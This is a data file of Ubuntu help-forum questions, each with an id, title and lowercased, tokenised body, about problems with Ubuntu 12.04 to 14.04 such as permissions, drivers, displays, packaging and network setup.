450653	how to give groups and users different permissions .	i have an assignment whereby i am asked to create 5 user accounts in ubuntu and then create 3 groups for them to belong to . this part i did just fine . there are now 5 user accounts in my ubuntu os created via the terminal and they all belong to the groups i was supposed to create . the next part of the question however has me completely , utterly and entirely stumped . i have spent 5 days scouring the depths of the internet and searching through all kinds of manuals to try and work out how to do the next stage of the assignment and to be perfectly honest i am getting close to throwing in the towel and walking away . so what i need to do is to give each of these groups different permissions and privileges inside of ubuntu . one group will be receiving all rights , another group will be given everything but writing permissions and the final 3 people will only have executing rights . and try as i might , i can not work it out . i have reached the end of my abilities to find a solution and now appeal to anyone out there who could give me direction or instruction on what it is i am to do to be able to complete this task . thank you for reading this and i hope someone out there has an answer or can point me in the right direction .
450654	installing monodevelop from ppa on ubuntu 14.04 ( trusty )	i 've just install ubuntu 14.04 ( trusty ) to give a test run as i need to use monodevelop i 've also decided to install that too . previously i 'd installed monodevelop compiling it from scratch on my 12.04 with so much effort . and this time i thought it would be nice if i could do it the easy way , ppa . so i added ppa : ermshiperete/monodevelop and tried : $ sudo apt-get install monodevelop-current reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : monodevelop-current : depends : monodevelop-4.0 ( = 4.2.2-1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i 'm relatively new to ppas so i 'm not sure if i 'm doing something wrong or there 's a problem with monodevelop + 14.04 ?
450655	mouse flickering on one of my two screens	i just installed ubuntu 14.04 and the mouse is now flickering on one of my two screens . the other screen does n't have any flickering . i was previously using ubunutu 13.10 without any issue . if i disable the screen that is working properly , the second screen stops flickering and starts to work properly . if i disable the screen that is flickering , the other screen continues to work properly . i already tried the solutions found here : ubuntu detects 2 monitors when i only have one mouse flickering/disappearing mouse cursor flickering and disappearing here is what my display settings look like : i 'm using the x.org x server - nouveau display driver from xserver-xorg-video-nouveau ( open source ) driver . if i try to switch to an proprietary nvidia one , and click the apply changes button , it just starts and takes for ever to complete , changes seems to never apply . here is what outputs xrandr : screen 0 : minimum 320 x 200 , current 3840 x 1080 , maximum 8192 x 8192 vga-1 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 521mm x 293mm 1920x1080 60.0*+ 1680x1050 59.9 1280x1024 75.0 60.0 1024x768 75.1 60.0 800x600 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 hdmi-1 disconnected ( normal left inverted right x axis y axis ) vga2 disconnected hdmi2 disconnected dp1 disconnected hdmi3 disconnected hdmi4 connected 1920x1080+1920+0 521mm x 293mm 1920x1080 60.0*+ 50.0 59.9 30.0 25.0 24.0 30.0 24.0 1920x1080i 60.1 50.0 60.0 1680x1050 59.9 1280x1024 75.0 60.0 1280x720 60.0 50.0 59.9 1440x576i 50.1 1024x768 75.1 60.0 1440x480i 60.1 60.1 800x600 75.0 60.3 56.2 720x576 50.0 720x480 60.0 59.9 640x480 75.0 72.8 66.7 60.0 59.9 720x400 70.1 dp2 disconnected dp3 disconnected virtual1 disconnected 1920x1080 ( 0x4b ) 148.5mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz 1680x1050 ( 0xa2 ) 119.0mhz h : width 1680 start 1728 end 1760 total 1840 skew 0 clock 64.7khz v : height 1050 start 1053 end 1059 total 1080 clock 59.9hz 1280x1024 ( 0xa3 ) 135.0mhz h : width 1280 start 1296 end 1440 total 1688 skew 0 clock 80.0khz v : height 1024 start 1025 end 1028 total 1066 clock 75.0hz 1280x1024 ( 0xa4 ) 108.0mhz h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1024x768 ( 0xa5 ) 78.8mhz h : width 1024 start 1040 end 1136 total 1312 skew 0 clock 60.1khz v : height 768 start 769 end 772 total 800 clock 75.1hz 1024x768 ( 0xa6 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0xa7 ) 49.5mhz h : width 800 start 816 end 896 total 1056 skew 0 clock 46.9khz v : height 600 start 601 end 604 total 625 clock 75.0hz 800x600 ( 0xa8 ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0xa9 ) 36.0mhz h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 640x480 ( 0xaa ) 31.5mhz h : width 640 start 656 end 720 total 840 skew 0 clock 37.5khz v : height 480 start 481 end 484 total 500 clock 75.0hz 640x480 ( 0xab ) 31.5mhz h : width 640 start 664 end 704 total 832 skew 0 clock 37.9khz v : height 480 start 489 end 491 total 520 clock 72.8hz 640x480 ( 0xac ) 30.2mhz h : width 640 start 704 end 768 total 864 skew 0 clock 35.0khz v : height 480 start 483 end 486 total 525 clock 66.7hz 640x480 ( 0xad ) 25.2mhz h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 60.0hz 720x400 ( 0xae ) 28.3mhz h : width 720 start 738 end 846 total 900 skew 0 clock 31.5khz v : height 400 start 412 end 414 total 449 clock 70.1hz
450658	how to create a task manager that runs on kernel ?	i am a cs student and i am currently studying operating systems , my project is to create a task manager similar to windows task manager , but the problem is i do n't know where to start . i have exhausted all my resources and i have to submit the project in 3 days.please help ! ! ! ! the task manager has to run on kernel .
450661	mouse acceleration in 14.04	i 'm trying to figure out how to enable mouse acceleration in ubuntu 14.04 . i have an xps 15 9530 , which has a built-in touch-pad ( which appears to be recognised , as seen in the screenshot below ) , but i also have a microsoft touch arc mouse , which works , but does n't have any acceleration , meaning it 's very slow to use . is there some way i can enable acceleration ? thank you .
450662	sony vaio fit - auto rotate flip scrren	i got this nice laptop with a flip-screen ... however i got different problems : sometimes the touchscreen has problems : scrolling acts like 2-finger pinching ( e.g . in the web browser it zooms in and out ) no auto screen rotation : in win8 when i flip the screen it automatically rotates ... .in ubuntu i ca n't even rotate it manually ( the touchscreen input does n't rotate ) looking forward for your help . ubuntu 14.04 sony vaio svf14na1em
450663	flash not supported on webapps	on ubuntu 14.04 , you can not see flash contents using a webapp such as youtube or grooveshark . i installed flashplugin-istaller and pepperflashplugin-nonfree and i can see flash contents on both firefox and chromium
450664	how do i upgrade from 12.04 to 14.04 ?	these seem to get marked as duplicate ... but there is an easily available piece of information that i had to do quite a bit of perusing to find that i think most users asking would like to see : per the fridge '' users of 12.04 lts will be offered the automatic upgrade when 14.04.1 lts is released , which is scheduled for july 24th . '' i 'm only posting this in case some other frustrated user is looking for this information , and like me , is not finding it in the other answers the `` duplicates '' are being referred to .
450666	brightness does n't change in sony vaio	i am using sony vaio with ubuntu 12.10 in dual boot with windows 7 and amd radeon graphic card . brightness settings are not working in ubuntu and it is releasing lots of heat . please help me how to solve this brightness mystery ... ..
450667	ubuntu touch uninstall p4	i have installed ubuntu touch on my samsung galaxy tab 10.1 ( gt-i5500 ) ( p4wifi ) but it does n't look as good as i thought . now , i want to reinstall the stock firmware , but odin on windows does n't show the tab as usb device . is there any way to reinstall android ? ( sorry for my bad english , i am from germany )
450669	install on acer aspire 4752	i am at my wits end with this computer . i bought and acer aspire 4752 with a fully loaded version of windows 7 on it . i prefer ubuntu so i began to install 14.04 from usb . got the error : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . so i tried a different usb stick , same error . tried different versions of ubuntu , got the same error . i 've used startup disk creator and unetbootin to make start usb boot devices . i can boot with the usb drive and run ubuntu that way . i even checked the hard drive using the tools in ubuntu . everything was fine , except it said the hard drive was hot . i tried a different hard drive . got same error above . i ran a test with mem86 , everything was fine . no matter what i do , using the usb gives me the errno5 error . i then switched to using dvds . now i keep getting an uncompression error when installing ubuntu 14.04 or 12.04 . i ca n't figure out for the life of me why i get nothing but errors . can anyone help ?
450674	xbmc not picking up mkv movie	i just ripped my first blu ray . it plays fine in vlc but when i add it to the library in xbmc it does n't show up . i realize i can convert it to mp4 but i read that xbmc should play mkv files . any ideas ?
450677	ubuntu 14.04 not detecting free space	i have a 500gb hard disk . and i currently have a c : drive containing 80gb , a d : containing 280gb , and a system reserved drive with 349mb . i have free space of 104gb approximately which i emptied for installing ubuntu . when i live boot using my usb ubuntu detects my c and d drive and i think it added the free space with my d drive which appears as 301gb from ubuntu live , and gparted shows free space only 1mb ! gparted does not show any used or free space of any partition which i have . it shows a red alert sign on all the partitions . please help me with this i can not install ubuntu now except for using the windows installer and i do n't see install anongside windows 7 option in the setup .
450681	no sound with hp 500-016 running ubuntu 14.04	i have searched quite a lot looking for a solution . here is the sound info from the terminal . audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) i believe the problem is that my computer has the dvi-d connector that requires an adapter to connect an hdmi cord . the connector does n't output audio so i bought a 3.5mm stereo to red/white rca cable for the audio . the audio worked with a previous install of ubuntu , sorry i ca n't remember the release . ( long story i was trying to get win 8 and ubuntu to work together ... that 's another f^ & % king nightmare ) please please help . i have been using ubuntu for about 5 years and other than when i need to use a couple specialty hardware items i never even bother with windows .
450683	java plugin in chromium	icedtea-7-plugin installed but it does not appears in the list in about : plugins in chromium . not able to execute java applets . tried installing icedtea-7-plugin but in vain . using openjdk7 in 14.04
450687	how to fix messed up password screen when using full disk encryption ( caused by nvidia driver )	when using full disk encryption in ubuntu 14.04 a password is always required when the computer is started . this screen looked nice until i installed the proprietary nvidia driver . how can i fix this ?
450688	network connection error after suspend ubuntu 14.04	i 'm using ubuntu 14.04 and a dsl connection for internet . however , whenever i suspend and resume my session , i 'm no longer able to connect to the internet . could someone help me fix this ?
450689	how do i update keepass2 to current version in 14.04	how do i update keepass2 to newest version or better yet get it to update automaticaly in 14.04 ? the jtaylor repository does not seem to have trusty or i do n't know how to get it .
450691	track touchpad response in c ?	i would like to know how can i get response from touchpad ( after doing some action on touchpad ) in a c program or in a shell script in ubuntu ? i am craeting a simple app which will allow me to disable/enable my touchpad when i tap upper left corner of my touchpad for 3 times consecutively . thanks a lot !
450692	ffmpeg audio not recording	i 'm having some issues recording sound with ffmpeg on ubuntu . ffmpeg -v verbose -f x11grab -y -r 60 -s 1920x1080 -i :0.0 -vcodec mpeg4 -f alsa -i pulse -ar 44100 -acodec libmp3lame -ab 192k -ac 2 output.mp4 -qscale 0 video comes out flawlessly and at a small filesize but no sound is outputted .
450698	how to turn on and off bluetooth visibility mode ?	i already turned on my bluetooth by running sudo rfkill unblock bluetooth command on terminal.i want to turn on my blutooth visibility mode also , so that only my device will get detected.all i have to do from command-line . how to turn on and off bluetooth 's visibility mode in ubuntu 14.04 from command-line ?
450699	graphical special effects not working as well as the rendering looks so old	i had installed gnome and then removed it using ppa-purge , then when i restarted the computer , the graphics look horrible , something like old windows xp - all the graphics effects disabled i may have uninstalled some packages , i have attached a screenshot , http : //drive.google.com/file/d/0b3tg7z178m-dagtjd19cmxnutee/edit ? usp=sharing look how bad gvim looks any suggestion how it can be fixed ? thanks
450704	unity webapp is not working in ubuntu 14.04	i created an unity webapp for telegram : it works perfect in ubuntu 13.10 . in ubuntu 14.04 is not working : i open the webogram web . firefox is asking about to install the webapp > i click yes . problem : no icon appears in the unity launcher . am i missing something ? thanks in advance ! ps : how can you test it ? i 'm working in a ppa , but now , you can install this installer . then visit webogram web . unity will ask you about to install the webapp .
450705	dsl connection in ubuntu 12.04	i have installed ubuntu 12.04 alongside with windows7 . i am unable to use the lan in ubuntu.i have made a dsl connection in ubuntu with username and password provided by the isp . i also checked whether ppoeconf is installed or not . it was n't in beginning then i inserted ubuntu cd and run the command sudo apt-get install ppoeconf .it read the files but said could n't locate ppoeconf.please someone help me to use internet in ubuntu !
450706	have to restart lightdm when opening laptop lid after 14.04 upgrade	i 've just upgraded to 14.04 . whenever i shut the laptop lid and come back to it later , after entering the password the screen just goes blank and requires ctrl+alt+f2-ing to a terminal to restart lightdm in order to get everything back working again . i ca n't see anything obvious in the lightdm logs . i 've deleted ~/.xauthority as per the answer to a similar question to no avail . any ideas ?
450709	sudo has a different language than non-sudo	i installed the japanese language some time ago to attempt to improve my japanese , however since i had not good enough language i reverted it back . the problem is that now , the programs that i run using sudo as gparted are installed in japanese . how can i revert this ?
450715	dual boot accident : advice	i installed ubuntu 14.04 alongside windows 7 and i believe i hosed my ability to boot to w7 by incorrectly selecting partition 1 , labeled `` system reserved '' as my bootload partition when it should have been outside all my partitions to the disk . ( i do not have a good working knowledge of partitioning ) when i select windows in the boot menu , i 'm taken back to the original boot menu listing ubuntu , memcheck and windows 7 . there 's no booting w7 : ( my partition table lists 2 primary partitions 1 & 2 with system reserved on 1 and w7 on 2 . then a new logical partition 3 containing a ubuntu swap in 5 and / in 6 ( no 4 ) . to further complicate things , i messed up my ubuntu install and i reinstalled ubuntu back to partitions 5 & 6 with the bootloader now outside all my partitions ( the default in an install ) . what should i do ? i 'm backing up now . thanks community ! sorry for rephrasing a question that i 'm sure has been asked a million times , but i 'm having trouble following some of those posts and i 'm not exactly sure which applies to my specific problem .
450716	increasing size of swap partition	there are other postings on this topic , but because of the importance of getting it right i am posting the exact details of my requirement . my disk is : /dev/sda /dev/sda/sda1 to be mounted as / has 10gb /dev/sda/sda6 to be mounted as /home has 150gb /dev/sda/sda5 to be mounted as /swap has 1gb i have 1gb of ram and think it would be advisable to increase the /swap partition to 2gb ( tell me if you disagree ) . there is no unallocated space on the disk although plenty of spare space in /home . can i increase the /swap either when installing ubuntu 14.04 or with something like gparted , without damaging the data in /home ? obviously i would do a backup first .
450722	why not work apache virtual hosts on ubuntu 14.04 ?	i was install apache 2.4 on ubuntu 14.04 and it work fine by http : //localhost/ address . but when i try to add new virtual host , for example http : //bow.loc and restart apache , new address not available by http : //bow.loc and available by http : //localhost . my configuration is : < virtualhost *:80 > servername www.bow.loc serveralias bow.loc documentroot /var/www/html/bow/web < directory /var/www/html/bow > allowoverride all options followsymlinks multiviews order allow , deny allow from all < ifmodule mod_rewrite.c > rewriteengine on rewritecond % { request_filename } ! -f rewriterule ^ ( . * ) $ /app.php [ qsa , l ] < /ifmodule > < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > how can i get my site by http : //bow.loc ?
450728	how to identify the name of the package ?	lets say i want to download the 'full gnome desktop environment , with extra components ' in the image below . what is the name of the package ? is it 'gnome ' or 'full gnome desktop environment , with extra components ' or ... ?
450729	14.04 aborts in the middle of installation , but somehow works fine	last night i 've tried upgrading my system to v14.04 . the system aborted the upgrade about three hours in , saying that there were some files unable to be installed , and it said something along the lines of `` run dpkg -a '' . neither dpkg nor apt-get worked , so i rebooted my pc , and expected the worst . my pc seemed to actually work fine after rebooting , and even confirmed that it was indeed running v14.04 , which is also the reason why the command do-release-upgrade does n't work . however , i feel that the upgrade is incomplete , though i have also done update-manager -d , just to be on the safe side . is there anything else i should to to make sure nothing is broken or corrupted ?
450730	recovery of data from unknown file system hdd	i need to recover my files from my external hd . any help is greatly appreciated . i have a 2tb external hard , i made a mistake and tried to make it bootable ubuntu installation disk from the .iso file . but now all my files are gone . i was trying to run testdisk on it when he asked me for my partition type table ( which i did n't know ) . here is the info returned from gdisk of my device . gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : mbr only bsd : not present apm : not present gpt : not present *************************************************************** found invalid gpt and valid mbr ; converting mbr to gpt format . *************************************************************** warning ! secondary partition table overlaps the last partition by 33 blocks ! you will need to delete this partition or resize it in another utility . disk /dev/sdc : 3906963456 sectors , 1.8 tib logical sector size : 512 bytes disk identifier ( guid ) : 3f2ce61b-f286-49aa-a158-18f0d35517bd partition table holds up to 128 entries first usable sector is 34 , last usable sector is 3906963422 partitions will be aligned on 2048-sector boundaries total free space is 2014 sectors ( 1007.0 kib ) number start ( sector ) end ( sector ) size code name 1 2048 3906963455 1.8 tib 0700 microsoft basic data also gparted says it 's an unknown file system 1.82 tib device . thanks
450733	fresh 14.04 install , low screen res and blank virtual terminal	i just installed 14.04 64 bit desktop . screen resolution wont go higher than 1280x1024 on desktop ( monitor is 1680x1050 ) . i tried to go to a virtual terminal to install nvidia drivers and i get a blank screen . during boot i get no display until the graphical ubuntu login screen so i am not sure how to interrupt things to get to a working terminal where i can do a driver install . i somehow need to get my nvidia driver installed but i ca n't use anything from the repository since i need 334.21 for my gtx-750ti . any help would be appreciated .
450738	getting blank dark screen after booting saucy salmender	installed lubuntu 13.10 along side with windows 7 home premium two weeks ago , was able to use both os as and when required . unfortunately two days ago am not in a position to boot into either of os . on trying to boot into lubuntu- am getting blank screen- only brightness can be adjusted- nothing else- getting a completely dark blank screen.on d other hand windows is redirecting to lubuntu while trying to boot . my system dell inspiron 1545 ,250 gb hdd,4gbram . kindly help me to fix this issue . thank you
450739	how to set up portable applications ?	i am using ubuntu 14.04 . i have a folder in my home folder called portable . i want to be able to download self contained portable applications like variations of blender , place them in this folder , and then create launcher icons for each unique variation . i do not want them dependent on ppas , nor do i want them to require the official software center version installed in order to run . my reason for this is simple . i want everything easily added or removed for version experimentation with out being forced to dig through layers of system folders to add custom plugins , libraries and scripts . i want to have more than one icon on my launcher , and i do n't want multiple icons that only launch the installed version unless i open the folder containing the executable and double click it directly . i have already tried creating custom .desktop files with no success ( they seem to only launch an installed version or do nothing ) , and i 've had no luck searching for anything similar regarding portable applications . any help would be appreciated .
450745	start a php script from startmenu ( lubuntu )	i try to start a php script directly from the start menu of lubuntu . but it does n't work the only thing who 's happening is that it starts a terminal . i setted the permissions with chmod a+x . hers my wilmaa.desktop script : [ desktop entry ] name= wilmaa exec=php /home/user/.wilmaa/wilmaatv.php nodisplay=false categories=audiovideo ; type=application terminal=true path=/home/user/.wilmaa/ how can i make this shortcut work ?
450746	samsung keyboard backlight ubuntu 14.04	i have a samsung ativ book 8 the backlight on my keyboard worked in 13.10 until it ran an update that not only made the keyboard backlight stop working but the power off and restart option in the top unity tool bar to not work either now i have upgraded to 14.04 and these options are all still not functioning anyone have any ideas
450750	asus wifi led not working	i 'm using ubuntu 14.04 on an asus n76vb and my wifi is working , but my wifi led is not ( it 's always off ) . it does work in windows , so it 's not a hardware problem . the led is visible in /sys/class/leds as ath9k-phy0 , but if i execute echo 255 > /sys/class/leds/ath9k-phy0/brightness it does n't turn on . i 've tried : modprobe -r ath9k modprobe ath9k blink=1 but the led is still off . adding acpi_osi=linux to /etc/default/grub also does n't change anything ( except the led is now called ath9k-phy1 ) . this is not a big problem but it would be nice if it would work . edit output of modinfo ath9k : filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko license : dual bsd/gpl description : support for atheros 802.11n wireless lan cards . author : atheros communications srcversion : baf225eeb618908380b28da alias : platform : qca955x_wmac alias : platform : ar934x_wmac alias : platform : ar933x_wmac alias : platform : ath9k alias : pci : v0000168cd00000036sv*sd*bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd00003027bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002810bc*sc*i* alias : pci : v0000168cd00000036sv0000144fsd00007202bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd00002130bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000612bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000652bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000642bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd0000302cbc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003027bc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411ebc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411dbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411cbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411bbc*sc*i* alias : pci : v0000168cd00000036sv0000144dsd0000411abc*sc*i* alias : pci : v0000168cd00000036sv00001028sd0000020ebc*sc*i* alias : pci : v0000168cd00000036sv0000103csd0000217fbc*sc*i* alias : pci : v0000168cd00000036sv0000103csd000018e3bc*sc*i* alias : pci : v0000168cd00000036sv000017aasd00003026bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd0000213abc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000662bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000672bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000622bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd00003028bc*sc*i* alias : pci : v0000168cd00000036sv0000105bsd0000e069bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd0000302bbc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003026bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003025bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002812bc*sc*i* alias : pci : v0000168cd00000036sv00001b9asd00002811bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00006671bc*sc*i* alias : pci : v0000168cd00000036sv000011adsd00000632bc*sc*i* alias : pci : v0000168cd00000036sv0000185fsd0000a119bc*sc*i* alias : pci : v0000168cd00000036sv0000105bsd0000e068bc*sc*i* alias : pci : v0000168cd00000036sv00001a3bsd00002176bc*sc*i* alias : pci : v0000168cd00000036sv0000168csd00003028bc*sc*i* alias : pci : v0000168cd00000037sv*sd*bc*sc*i* alias : pci : v0000168cd00000034sv*sd*bc*sc*i* alias : pci : v0000168cd00000034sv000010cfsd00001783bc*sc*i* alias : pci : v0000168cd00000034sv000014cdsd00000064bc*sc*i* alias : pci : v0000168cd00000034sv000014cdsd00000063bc*sc*i* alias : pci : v0000168cd00000034sv0000103csd00001864bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006641bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006631bc*sc*i* alias : pci : v0000168cd00000034sv00001043sd0000850ebc*sc*i* alias : pci : v0000168cd00000034sv00001a3bsd00002110bc*sc*i* alias : pci : v0000168cd00000034sv00001969sd00000091bc*sc*i* alias : pci : v0000168cd00000034sv000017aasd00003214bc*sc*i* alias : pci : v0000168cd00000034sv0000168csd00003117bc*sc*i* alias : pci : v0000168cd00000034sv000011adsd00006661bc*sc*i* alias : pci : v0000168cd00000034sv00001a3bsd00002116bc*sc*i* alias : pci : v0000168cd00000033sv*sd*bc*sc*i* alias : pci : v0000168cd00000032sv*sd*bc*sc*i* alias : pci : v0000168cd00000032sv00001043sd0000850dbc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00001c01bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00001c00bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001f95bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001195bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001f86bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001186bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00002001bc*sc*i* alias : pci : v0000168cd00000032sv00001b9asd00002000bc*sc*i* alias : pci : v0000168cd00000032sv0000144fsd00007197bc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e04fbc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e04ebc*sc*i* alias : pci : v0000168cd00000032sv000011adsd00006628bc*sc*i* alias : pci : v0000168cd00000032sv000011adsd00006627bc*sc*i* alias : pci : v0000168cd00000032sv00001c56sd00004001bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002100bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002c97bc*sc*i* alias : pci : v0000168cd00000032sv000017aasd00003219bc*sc*i* alias : pci : v0000168cd00000032sv000017aasd00003218bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c708bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c680bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000c706bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410fbc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410ebc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd0000410dbc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd00004106bc*sc*i* alias : pci : v0000168cd00000032sv0000144dsd00004105bc*sc*i* alias : pci : v0000168cd00000032sv0000185fsd00003027bc*sc*i* alias : pci : v0000168cd00000032sv0000185fsd00003119bc*sc*i* alias : pci : v0000168cd00000032sv0000168csd00003122bc*sc*i* alias : pci : v0000168cd00000032sv0000168csd00003119bc*sc*i* alias : pci : v0000168cd00000032sv0000105bsd0000e075bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002152bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd0000126abc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002126bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00001237bc*sc*i* alias : pci : v0000168cd00000032sv00001a3bsd00002086bc*sc*i* alias : pci : v0000168cd00000030sv*sd*bc*sc*i* alias : pci : v0000168cd0000002esv*sd*bc*sc*i* alias : pci : v0000168cd0000002dsv*sd*bc*sc*i* alias : pci : v0000168cd0000002csv*sd*bc*sc*i* alias : pci : v0000168cd0000002bsv*sd*bc*sc*i* alias : pci : v0000168cd0000002bsv00001a3bsd00002c37bc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd00001536bc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd0000147dbc*sc*i* alias : pci : v0000168cd0000002asv000010cfsd0000147cbc*sc*i* alias : pci : v0000168cd0000002asv0000185fsd0000309dbc*sc*i* alias : pci : v0000168cd0000002asv00001a32sd00000306bc*sc*i* alias : pci : v0000168cd0000002asv000011adsd00006642bc*sc*i* alias : pci : v0000168cd0000002asv000011adsd00006632bc*sc*i* alias : pci : v0000168cd0000002asv0000105bsd0000e01fbc*sc*i* alias : pci : v0000168cd0000002asv00001a3bsd00001c71bc*sc*i* alias : pci : v0000168cd0000002asv*sd*bc*sc*i* alias : pci : v0000168cd00000029sv*sd*bc*sc*i* alias : pci : v0000168cd00000027sv*sd*bc*sc*i* alias : pci : v0000168cd00000024sv*sd*bc*sc*i* alias : pci : v0000168cd00000023sv*sd*bc*sc*i* depends : ath9k_hw , mac80211 , ath9k_common , cfg80211 , ath intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 00 : a5 : a6:57:59 : de:47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 parm : debug : debugging mask ( uint ) parm : nohwcrypt : disable hardware encryption ( int ) parm : blink : enable led blink on activity ( int ) parm : btcoex_enable : enable wifi-bt coexistence ( int ) parm : bt_ant_diversity : enable wlan/bt rx antenna diversity ( int ) parm : ps_enable : enable wlan powersave ( int ) output of cat /sys/module/ath9k/parameters/blink : 1
450752	debuild : no upstream tarball found	what is the correct naming convention for a patched package ? i am trying to put together a version of exiv2 with patch to add an extra schema . here is what i have done so far : $ sudo apt-get build-dep exiv2 $ cd src/exiv2 $ apt-get source exiv2 $ cd exiv2-0.23-1ubuntu2 ... apply patch $ dpkg-source -- commit $ dch -i exiv2 ( 0.23-1ubuntu2-dwc1 ) trusty ; urgency=medium $ debuild -s -sd -k1230cb40 but i then get an error message : this package has a debian revision number but there does not seem to be an appropriate original tar file or .orig directory in the parent directory ; ( expected one of exiv2_0.23-1ubuntu2.orig.tar.gz , exiv2_0.23-1ubuntu2.orig.tar.bz2 , exiv2_0.23-1ubuntu2.orig.tar.lzma , exiv2_0.23-1ubuntu2.orig.tar.xz or exiv2-0.23-1ubuntu2.orig ) continue anyway ? ( y/n ) y dpkg-source -b exiv2-0.23-1ubuntu2 dpkg-source : error : ca n't build with source format '3.0 ( quilt ) ' : no upstream tarball found at ../exiv2_0.23-1ubuntu2.orig.tar . { bz2 , gz , lzma , xz } dpkg-buildpackage : error : dpkg-source -b exiv2-0.23-1ubuntu2 gave error exit status 255 debuild : fatal error at line 1364 : dpkg-buildpackage -rfakeroot -d -us -uc -s -sd failed $ ls .. exiv2-0.23-1ubuntu2 exiv2_0.23-1ubuntu2.debian.tar.gz exiv2_0.23-1ubuntu2.dsc exiv2_0.23-1ubuntu2-dwc1_source.build exiv2_0.23.orig.tar.gz what do i need to do to allow debuild to recognize the original tar file ?
450758	has nvidia 331.38 support for optimus ?	i 'm going to install ubuntu 14.04 on my laptop with intel & nvidia graphics card . do i have to install bumblebee or nvidia 331.38 has support for optimus . i do n't use nvidia card i would like to use only intel card due to lower using battery . thx in advance : - )
450760	cinnamon on ubuntu 14.04	is it already possible to install cinnamon on new `` trusty '' ubuntu ? if yes , how ? i have tried to search it in official repos but without success and ppa that worked on 13.10 gwendal-lebihan-dev/cinnamon-stable does n't work on 14.04 , apt-get update gives w : failed to fetch http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-stable/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found
